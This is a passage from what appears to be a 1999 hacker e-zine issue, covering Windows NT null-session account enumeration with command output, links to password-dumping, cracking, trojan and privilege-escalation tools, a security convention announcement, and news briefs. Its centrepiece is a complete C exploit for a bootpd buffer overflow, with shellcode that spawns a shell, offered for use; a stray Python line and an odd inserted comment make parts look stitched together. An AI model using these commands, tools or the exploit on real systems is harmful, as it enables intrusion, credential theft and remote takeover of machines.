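    print(audit_accounts(SAMPLE_ACCOUNTS))
```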
   nslookup www.xyz.com
   Non-authoritative answer:
   Name:    www.xyz.com
   Address: 131.107.2.200

   net use \\131.107.2.200\ipc$ "" /user:""
   The command completed successfully.

   user2sid \\131.107.2.200 "domain users"
   S-1-5-21-201642981-56263093-24269216-513
   Number of subauthorities is 5
   Domain is XYZ_domain
   Length of SID in memory is 28 bytes
   Type of SID is SidTypeGroup

   sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 500
   Name is XYZAdmin
   Domain is XYZ_domain
   Type of SID is SidTypeUser

   sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1000
   Name is
   Domain is XYZ_domain
   Type of SID is SidTypeDeletedAccount

   sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1001
   Name is Simpson
   Domain is XYZ_domain
   Type of SID is SidTypeUser

   sid2user \\131.107.2.200 5 21 201642981 56263093 24269216 1112
   LookupSidName failed - no such account

For those who would like to try it, the utilities can be found at http://www.ntbugtraq.com; follow the links to the new downloads page, where you'll find his usage page with a link to the zip.

SOLUTION

SP3 does not prevent this from happening. At this time there is no fix for this, except to filter connections to port 139. So, at the moment, if you can get a null session, you can dump all the users, groups, and machine accounts.

Linkz and Utilities Needed?
I will include the utilities needed to administer --:) NT

PWDUMP                 > http://www.geocities.com/CapitolHill/7237/pwdump.zip
NTFSDOS                > http://www.geocities.com/CapitolHill/7237/ntfs130.zip
LOPHTCRACKER           > http://www.geocities.com/CapitolHill/7237/lc15-li.zip
                         ftp://ftp.technotronic.com/M1cro$oft/lc201exe.zip
NT Security/Unsecurity > http://www.ntsecurity.net/
BUGTRAQ Archive        > http://www.geek-girl.com/bugtraq/search.html

C2MYAZZ SMB Downgrade

When a M1cro$oft networking client creates a new connection to an NT Server, it is possible for another computer on the same physical network to `spoof' the M1cro$oft client into sending a clear-text password to the NT Server, bypassing all password encryption and allowing the client's clear-text password to be discovered by any other device on the same physical network. This program actually runs on a W1nd0wz based system loaded with Novell ODI style drivers running in promiscuous mode. Once active, the software listens for SMB negotiations and, upon detecting one, sends a single packet to the client instructing it to downgrade its connection attempt to a clear-text level, at which point the client silently obeys by sending its password in clear, readable text. Once this happens, this little piece of software grabs the password as it travels over the wire and displays it on the screen. The client is successfully connected to the NT Server, and the user remains none the wiser that their password has just been grabbed.

ftp://ftp.technotronic.com/M1cro$oft/c2myazz.zip

L0phtCrack 2.01 Challenge/Response Exploit

PPTP sniffer for Solaris. The PPTP sniffer works with any Unix that has libpcap. This program also contains an active attack which exploits an MS-CHAP problem to retrieve the LANMAN and NT password hashes without the extra layer of encryption of the challenge/response. This makes password cracking much quicker.
W1nd0wz NT supports the following two types of challenge/response authentication:

 - LanManager (LM) challenge/response
 - W1nd0wz NT challenge/response

To allow access to servers that only support LM authentication, W1nd0wz NT clients currently send both authentication types. Here is a description of the challenge that takes place over the network when a client, such as a W1nd0wz 95 machine, connects to an NT Server

ftp://ftp.technotronic.com/M1cro$oft/lc201exe.zip

GETADMIN

Getadmin.exe works because of a problem in a low-level kernel routine that causes a global flag to be set which allows calls to NtOpenProcessToken to succeed regardless of the current user's permissions. This in turn allows a user to attach to any process running on the system, including a process running in the system's security context, such as WinLogon. Once attached to such a process, a thread can be started in the security context of the process. In the specific case of GetAdmin, it attaches to the WinLogon process, which is running in the system's security context, and makes standard API calls that add the specified user to the Administrators group.

It is important to note that any account which has been granted the right to "Debug Programs" will always be able to run Getadmin.exe successfully, even after the application of the hotfix. This is because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and should only be granted to fully trusted users. Also, if Getadmin.exe is run with an account that is already a member of the local Administrators group, it will still work (even after applying the hotfix). This is by design: members of the Administrators group always have the rights to make the calls GetAdmin needs in order to succeed.

ftp://ftp.technotronic.com/M1cro$oft/getadmin.zip

SECHOLE

Sechole.exe allows a non-administrative user to gain debug-level access on a system process.
Using this utility, the non-administrative user is able to run some code in the system security context and thereby grant himself or herself local administrative privileges on the system. Sechole.exe locates the memory address of a particular API function (OpenProcess) and modifies the instructions at that address in a running image of the exploit program on the local system. Sechole.exe then requests debug rights, which give it elevated privileges. The request is successful because the access check for this right is expected to be done in the API that was successfully modified by the exploit program. Sechole.exe can now add the user who invoked it to the local Administrators group.

ftp://ftp.technotronic.com/M1cro$oft/sechole2.zip

NetBus 1.60

Similar in functionality to Back Orifice. Works under NT too.

Cleaner 1.9c

This program will clean up several trojans and has the potential to clean up after any trojan attack.

ftp://ftp.technotronic.com/M1cro$oft/netbus.zip
ftp://ftp.technotronic.com/M1cro$oft/cleaner19c.zip

NTFSDOS v2.0

Allows you to boot a DOS diskette and READ an NTFS partition.

ftp://ftp.technotronic.com/M1cro$oft/ntfs20r.zip

Linux NTFS Driver

NT's secured filesystem (NTFS) can be read from Linux, bypassing filesystem security.

ftp://ftp.technotronic.com/M1cro$oft/ntfs-970312_tar.gz

My Personal Feelings

I feel as though we should learn to coexist and compromise with hackers. As long as there are computers, there will be hackers.

NeatHack....

        e\\\_a_///t
         \\ - - //H
        N( @ @ )acK
+---------------oOOo-(_)-oOOo--------------------------------------+
|"Kn0w13dg3 i5 0n1y p0w3r if U hav3 th3 wi5d0m t0 us3 i7 c0rr3c71y"|
|"I7'5 nic3 70 b3 imp0r7an7. Bu7 i7'5 m0r3 imp0r7an7 70 b3 nic3"   |
+------------------------Oooo--------------------------------------+

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Rootfest 99                                                 Defiant/Lothos
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Rootfest 99 Details

Rootfest is a computer security convention and conference being held in Minneapolis, MN, May 21-23 1999. As far as I know, it's the first of its kind in the whole Midwest. It will be composed of many speakers, vendors, contests, events and door prizes. We welcome all computer security professionals, the computer underground, IT professionals, government agents, feds, and anyone who would like to come and learn about computer security. We've got a wide variety of speakers lined up already and we are still in the process of adding more.

Speakers

We currently have numerous speakers lined up for Rootfest and we would like to be able to add to the list. If you would like to speak, please contact lothos via e-mail, lothos@trifid.net.

Bruce Schneier
  Topic: To be announced.
  Credentials: Published author of Applied Cryptography and president of Counterpane Systems.

Steve Stakton aka Optiklenz
  Topic: Cisco PIX Firewall Security Analysis
  Credentials: Founder of Legions Interactive and LoU. He has accomplished much in his time as an Underground Researcher.

Adam L. Beberg
  Topic: V3 Security (Tentative)
  Credentials: Distributed.net founder, the world's largest computer.

Konceptor
  Topic: Monitoring IRC, evading capture, Naval Surface Warfare Center.
  Credentials: US Hacker.

Mike Roadancer
  Topic: "Hacker - It's not a dirty word": Hackers in the workplace.
  Credentials: Founder, Hackers Defence Foundation.

Brian Ristuccia
  Topic: Ideas on Internet censorship
  Credentials: Bay Networks contractor

Paul McNabb
  Topic: Trusted Operating Systems Technology in Web-based computing
  Credentials: CTO of Argus Systems Group, Inc.
Brenno J.S.A.A.F de Winter
  Topic: Internet Security in Europe - State of Affairs.
  Credentials: Netherlands Hacker.

DataShark
  Topic: Tempest Monitoring and Protection
  Credentials: Systems Administration and Hacker.

Richard Thieme
  Topic: Actionable Intelligence: Beyond Trophy-Hacking to Playing for Big Stakes.
  Credentials: Black Hat keynote speaker, Defcon 4, 5, 6 speaker.

To close, I would like to thank everyone that is supporting me and the rest of the Rootfest team. We are still in the process of finalising more details, such as events like hack the flag, and adding more speakers to our already impressive list. If you would like to contact me further regarding Rootfest, please check out http://www.rootfest.org or feel free to e-mail me at lothos@trifid.net.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bootpd Exploit                            Broken ass code Revamped by Bronc
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

/*
 * Bootpd Exploit against debian linux 1.3 and 2.0 and possibly others
 *
 * (C) 1998 Willem Pinckaers W.H.J.Pinckaers@cpedu.rug.nl
 *
 * Broken ass code fixed by Bronc Buster - Dec 1998
 *
 * If you get this and it's missing the two .h files
 * just forget it (unless you are lucky and have them already)
 * Anyone with half a brain could have fixed this to work, so if
 * you are using this now, either I gave it to you, or you are
 * a k0d3 kIdDi3 ;)
 *
 * to compile: gcc bootpd.c -o bootp
 */

/* Standard headers; the header names were lost from the printed listing. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "bootp.h"

#define MAX_MSG_SIZE 500

char shellcode[] =
    "\x31" "\xc9" "\x89" "\xc8" "\x04" "\x66" "\x41" "\x89"
    "\xca" "\x89" "\xcb" "\xeb" "\x7f" "\x5f" "\x89" "\x4f"
    "\x08" "\x41" "\x89" "\x4f" "\x04" "\x80" "\xc1" "\x04"
    "\x89" "\x4f" "\x0c" "\x8d" "\x4f" "\x04" "\xcd" "\x80"
    "\x89" "\x07" "\x31" "\xc9" "\x80" "\xc1" "\x02" "\x66"
    "\x89" "\x4f" "\x0c" "\x66" "\x89" "\x4f" "\x0e" "\x80"
    "\xc1" "\x0e" "\x66" "\x89" "\x4f" "\x08" "\x66" "\xb9"
    "\x30" "\x39" "\x66" "\x89" "\x4f" "\x0e" "\x8d" "\x47"
    "\x0c" "\x89" "\x47" "\x04" "\x31" "\xc9" "\xb1" "\x03"
    "\x89" "\xca" "\x89" "\xcb" "\x89" "\xf9" "\x31" "\xc0"
    "\x04" "\x66" "\xcd" "\x80" "\x31" "\xc0" "\x89" "\xc1"
    "\x04" "\x3f" "\x89" "\xc2" "\x8b" "\x1f" "\xcd" "\x80"
    "\x89" "\xd0" "\x41" "\xcd" "\x80" "\x89" "\xd0" "\x41"
    "\xcd" "\x80" "\x31" "\xc0" "\x89" "\x47" "\x10" "\x88"
    "\x47" "\x1b" "\x8d" "\x47" "\x14" "\x89" "\x47" "\x0c"
    "\x31" "\xc0" "\x04" "\x0b" "\x8d" "\x5f" "\x14" "\x8d"
    "\x4f" "\x0c" "\x8d" "\x57" "\x10" "\xcd" "\x80" "\x31"
    "\xc0" "\x40" "\xcd" "\x80" "\xe8" "\x7c" "\xff" "\xff"
    "\xff" "\x2e" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41"
    "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x39"
    "\x30" "\xc0" "\xa8" "\x01" "\x01" "\x2f" "\x62" "\x69"
    "\x6e" "\x2f" "\x73" "\x68" "\x00";

#define SERVER_PORT 67

char client_addr[16] = "127.000.000.001";
char host_addr[16]   = "207.053.133.005";
int realpath_adjust  = 0;
int exploit_length   = 1200;

struct sockaddr_in server_addr;

void sendpacket(int, struct bootp *);
void build_packet(struct bootp *, int, char **);
void get_args(int, char **);
void usage(void);

int main(int argc, char *argv[])
{
    struct bootp *bp;
    int s;

    get_args(argc, argv);

    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(SERVER_PORT);
    server_addr.sin_addr.s_addr = inet_addr(host_addr);

    if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        fprintf(stderr, "cannot create socket\n");
        exit(1);
    }

    if ((bp = (struct bootp *) malloc(MAX_MSG_SIZE + 1000)) == NULL) {
        (void) fprintf(stderr, "Cannot malloc.\n");
        exit(1);
    }
    (void) memset(bp, 0, MAX_MSG_SIZE + 1000);

    /* ai exploit isn't secure */
    build_packet(bp, argc, argv);
    sendpacket(s, bp);
    return 0;
}

void sendpacket(int s, struct bootp *bp)
{
    if (sendto(s, (const void *) bp, MAX_MSG_SIZE, 0,
               (const struct sockaddr *) &server_addr,
               sizeof(struct sockaddr_in)) == -1) {
        fprintf(stderr, "sendpacket: sendto returned -1 ;(\n");
        exit(1);
    }
}

void build_packet(struct bootp *bp, int argc, char *argv[])
{
    unsigned long start_realpath = 0xbffff684 + realpath_adjust;
    unsigned long addr_ret_addr = start_realpath + 8 + 0x488;
    unsigned long temp_addr, temp_addr2 = 0;
    int length_tftpdir = 1;   /* no tftpdir, just a slash at the start.. */
    int num_nops = 600;
    char *p;
    unsigned long *q;
    int i;

    bp->bp_op = BOOTREQUEST;
    bp->bp_xid = 58524;
    bp->bp_htype = HTYPE_ETHERNET;
    bp->bp_hlen = 6;
    bp->bp_ciaddr.s_addr = inet_addr(client_addr);

    printf("Using: client: %s\n", client_addr);
    printf("Using: server: %s\n", host_addr);
    printf("Addr of realpath: %lx\n", start_realpath);

    p = bp->bp_file;

    /* Putting in nops */
    for (i = 0; i < num_nops; i++)
        *p++ = 0x90;
    printf("Added: %d nops\n", num_nops);

    /* Putting in shellcode */
    for (i = 0; i < (int) strlen(shellcode); i++)
        *p++ = shellcode[i];
    printf("%d bytes of shellcode added.\n", (int) strlen(shellcode));

    /* Aligning to make sure the ret_addr is placed correctly */
    temp_addr = p - bp->bp_file + length_tftpdir + start_realpath;
    for (i = 0; i < (int) ((addr_ret_addr - temp_addr) % 4); i++)
        *p++ = 'a';
    printf("%d bytes of alignment added.\n",
           (int) ((addr_ret_addr - temp_addr) % 4));

    /* set return address.. hopefully in exploit code.... */
    temp_addr2 = start_realpath + length_tftpdir + (num_nops / 2);
    if (!(temp_addr2 & 0xff))
        temp_addr2++;
    printf("Setting return addr to: %lx \n", temp_addr2);

    q = (unsigned long *) p;
    do {
        *q++ = temp_addr2;
        p = (char *) q;
    } while ((p - bp->bp_file) < exploit_length);
    *p++ = '\0';

    printf("Exploit length: %d \n", (int) strlen(bp->bp_file));
}

void get_args(int argc, char *argv[])
{
    int ch;

    while ((ch = getopt(argc, argv, "c:s:a:e:")) != EOF) {
        switch (ch) {
        case 'c':
            strcpy(client_addr, optarg);
            break;
        case 's':
            strcpy(host_addr, optarg);
            break;
        case 'a':
            realpath_adjust = atoi(optarg);
            break;
        case 'e':
            exploit_length = atoi(optarg);
            break;
        default:
            usage();
        }
    }
}

void usage(void)
{
    printf("bootpd exploit against debian linux 1.3 and 2.0 (probably others)\n");
    printf("\nBy Willem Pinckaers (W.H.J.Pinckaers@cpedu.rug.nl) 1998\n");
    printf("\nUsage:\n\tbootpd: -c client_addr -s server_addr -a offset\n");
    exit(1);
}

Files compiled with the zip version of Keen Veracity Issue Six:

 o bootpd.h
 o bootpd.c
 o bptypes.h

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
In the news                                                        sources
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

__________________________________________
OpenPGP Wins IETF Proposed Standard Status
__________________________________________

OpenPGP, the open standards version of Network Associates Inc.'s PGP (Pretty Good Privacy) encryption technology, has received a promotion. According to a statement issued by Network Associates, OpenPGP has been promoted to "Proposed Standard" status by the Internet Engineering Task Force. With this promotion, Network Associates also granted full change control over the OpenPGP protocols.

__________________________________________
VLSI Licenses RSA Technology for Networking Security Chip
-------------------------------------------

RSA Data Security Inc.
of San Mateo, CA, announced that VLSI Technology Inc., a San Jose, CA, maker of system-on-a-chip custom ICs, has incorporated RSA's security technology into a new Internet Protocol Security (IPSEC) coprocessor chip. The VLSI chip will be used in networking hardware for Internet commerce applications, says RSA. Key commercial applications for VLSI security chips include electronic commerce, cable modems, satellite data transmission, voice and data communications and consumer video.

__________________________________________
IDSL NIC Goes Interoperable with Cisco 901 Multiplexer
-------------------------------------------

Xpeed Inc., a Santa Clara, CA, supplier of high-performance, low-cost connectivity devices for digital subscriber line (DSL) connections, announced that its Model 200 IDSL network adapter has been tested and certified by Cisco Systems as interoperable with Cisco's 90i central office system. The PCI adapter, which is scheduled to ship later this month, was tested and certified by Cisco's laboratories as fully compatible with its 90i Channel Unit for D4 channel bank frame multiplexers.

__________________________________________
-------------------------------------------

DNA evidence is now a prominent part of criminal trials. Researchers at the IBM Watson Research Laboratory think they can apply the lessons of forensic science to the hunt for computer hackers. They have developed a computer algorithm to learn about strands of DNA. Giving it the name "Teiresias," for a blind seer in Greek folklore, they have put it to work spotting patterns that could catch hackers at work.
Modern computers are fast enough to detect the patterns hackers are using to break into a network. (Wired)

-------------------------------------------

*--------------------------------------------------*
| Legions of the Underground                       |
| www.legions.org                                  |
| Submissions = digi@wintermute.linux.tc           |
| Distro Information = webmaster@legions.org       |
*--------------------------------------------------*

---------------------------------------------------------------------------
This has been a Legions of the Underground Production
---------------------------------------------------------------------------